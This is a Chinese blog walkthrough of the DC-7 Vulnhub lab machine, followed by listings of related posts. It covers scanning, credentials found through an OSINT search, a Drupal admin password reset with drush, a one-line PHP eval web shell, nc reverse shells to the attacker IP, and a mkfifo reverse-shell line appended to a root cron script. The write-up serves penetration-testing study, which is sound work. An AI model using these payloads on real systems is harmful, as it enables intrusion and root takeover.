渗透测试:DC-7靶机

最新推荐文章于 2024-03-27 20:01:53 发布
最新推荐文章于 2024-03-27 20:01:53 发布
阅读量258 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46706771/article/details/119880073
版权

一、扫描获取靶机ip

arp-scan -l

在这里插入图片描述

192.168.203.146

二、获取网站信息

1.nmap

nmap -sV -A 192.168.203.146

在这里插入图片描述

开放22、80端口

2.Wappaloyzer

在这里插入图片描述

CMS:Drupal 8

Web服务器:Apache 2.4.25

操作系统:Debian

访问网站

在这里插入图片描述

提示说不是一个技术问题,无法通过爆破,可以考虑"outside" the box,可以考虑信息收集(社工)

在这里插入图片描述

发现一个@用户 @DC7USER

搜索一下发现了一个github用户
在这里插入图片描述在这里插入图片描述
进入然后访问config.php

在这里插入图片描述

得到用户名,密码

$username = dc7user
$password = MdR3xOgB7#dW

三、连接

使用ssh连接

ssh dc7user@192.168.203.146

在这里插入图片描述
与DC-4一样提示有新的邮件

查看邮件

cat /var/mail/dc7user

在这里插入图片描述
发现执行文件backups.sh,查看一下

cat /opt/scripts/backups.sh

在这里插入图片描述
gpg命令用来加密,drush命令是drupal框架中用来做一些配置的命令,它可以改变用户名密码
因为网站默认会有一个admin用户,所以我们进入到/var/www/html目录下,尝试使用drush命令修改admin用户的密码为233333

发现脚本文件中drush 命令可以修改密码

在这里插入图片描述

cd /var/www/html
drush user-password admin --password="233333"

在这里插入图片描述
成功登录

在这里插入图片描述

在这里插入图片描述

发现可以写入一个网页,但是网页类型没有PHP模式,所以需要下载一个PHP代码的插件,手动安装 PHP filter 模块

下载插件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2B0KFhsF-1629732253114)(C:\Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210814203335872.png)]

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

在这里插入图片描述
Install后跳转到模块添加成功页面,然后去激活这个模块

在这里插入图片描述
在这里插入图片描述
编辑DC-7

在这里插入图片描述
写入一句话木马,注意将文本格式更改成PHP

<?php@eval($_REQUEST['hack']);?>

在这里插入图片描述

3.蚁剑

在这里插入图片描述
连接成功
在这里插入图片描述

攻击机进行监听

nc -lvvp 3939

在这里插入图片描述

使用蚁剑的虚拟终端进行反shell连接

nc -e /bin/bash 192.168.203.141 3939

在这里插入图片描述

连接成功

在这里插入图片描述

使用python反弹一个交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

在这里插入图片描述

四、提权

在这里插入图片描述
当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

当前用户 www-data 用户具有写权限,我们通过写权限在该文件中添加反弹shell 指令,当root 用户根据其系统计划任务执行backups.sh 脚本时,会反弹root 的shell

在这里插入图片描述

攻击机进行监听

在这里插入图片描述

cd /opt/scriptsecho "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.203.141 4040 >/tmp/f" >> backups.sh大意:删除f文件,创建命名管道文件f,将cat f的结果作为输入传给命令执行(/bin/sh),将执行命令的结果重定向给 将nc 192.168.203.141 4040写入/tmp/f这一行为2>&1:将标准错误输出重定向到标准输出理解:这个系统每15分钟执行一次backups.sh脚本,将一条命令写入backups.sh等待下一次执行,写入的内容是删除原有的/tmp/f文件,然后创建一个名为f的命名管道文件,这个文件会执行一次命令执行,执行的内容是反shell连接(nc 192.168.203.141 4040)

需要等待一段时间(大约15分钟),因为这个脚本大约每15分钟执行一次

在这里插入图片描述

提权成功,在/root下读取flag

在这里插入图片描述

C1yas0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1177
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
DC-7渗透笔记
现代鲁滨逊的博客
05-12 235
做得多了就感觉只是无聊的步骤的重复,毫无技术上的提升,我感觉我不想再做下去了。 1.发现主机192.168.174.158 2.照例nmap扫描,22和80端口都开着呢。 3,访问站点,drupal的cms,dc-1的站点也是由drupal搭建的。 然后中间的提示是想传递一种新概念,不要暴力破解,让我们在盒子外面思考??get不到。 4.想扫目录来着,扫了好久都没扫完,就算了。 5.进到登录界面,想看看有没有sql注入的,扔到sqlmap,啥也没跑出来☹☹ 6.没有思路,瞎捣鼓一通之后
DC-7靶场
最新发布
mlws1900的博客
03-27 891
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
dc-7 靶机渗透学习
..
03-23 3838
信息收集 扫描当前网段 nmap -sP 192.168.202.0/24 查看开启的端口服务 nmap -A -p- -v 192.168.202.146 访问靶机的80端口,通过Wappalyzer识别出是Drupal 8 先看一下靶机的说明 不是技术性的?跳出框框去思考?ememm,那先观看一下网站的特点吧。 对比新搭建的Drupal框架,发现在最下方多了一个@DC7USER。 去谷歌搜索一下@DC7USER,发现了一个Dc7...
【CyberSecurityLearning 76】DC系列之DC-7渗透测试(Drupal)
_Co1a
05-09 854
目录 DC-7靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2、登录ssh 3、 提权(suid提权) 3.1 exim4提权 4、drush 命令对任意用户密码进行更改 5、登录admin 6、拿到root权限 DC-7靶机渗透测试 0x00实验环境 kali的IP:192.168.3.188 DC-7的MAC地址:00:0C:29:FB:B4:27(192.168.3.191) (使用Kali中的arp-scan工具扫描也可) 1.
Vulhub 靶场 DC-7解析
黑战士的博客
02-24 937
kali的靶攻击机IP地址:192.168.200.14DC-7靶机的IP地址:暂时未知注意:靶机和攻击机应处于一个网卡下通过MAC地址判断靶机DC-7的IP 地址。
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC user guide
01-08
Design Compile的官方用户手册,是使用DC进行电路综合必不可少的参考手册
DC-7靶机渗透测试
读书 买花 长大
04-30 359
DC-7
【Vulnhub靶机DC-7
过期的秋刀鱼
08-09 499
打开中国 蚁剑连接,蚁剑要想连接就得知道,刚上传的一句话木马所在的位置。目录下看看,发现是一个登录页面,这个时候没有密码,也不知道账户名。文件,发现里面内容重复的很多,是一封邮件,有一个可执行的脚本,同样的,把靶机跟kali放在同一网段,(NAT模式)一个以root权限定期执行的备份任务,执行文件。,就需要从其他方向找突破口了。目录里,发现都是看不懂的,搜了一下。后缀格式,发现是一种加密的文件格式。的权限,发现所有人都可以执行此文件。查看都有什么文件 ,使用命令。这么个关键词,发现有一个。
DC-7的靶机渗透
m0_74950307的博客
10-27 55
创建用户: drush user-create username --mail=user@example.com --password="password"模块的地址:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz。可以看到是久违的ssh端口还有最常见的http端口,还等什么,肯定是域名呀!查看了别人的资料,几乎都是进行了社工,原因是这个网站又一个创作者的签名。和其他的靶机差不多:是一个http://192.168.13.134。
DC-7靶机
Flamingo1998的博客
07-17 131
DC-7靶机
DC-7(drupal)靶机
qq_56726035的博客
07-20 134
再次记录一次drupal渗透。
DC-7靶机进行渗透测试
zll___的博客
03-24 250
DC-7靶机进行渗透测试
DC-7靶机渗透测试 (GPG,drush,mkfifo,nc提权)
single_g_l的博客
08-13 1181
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值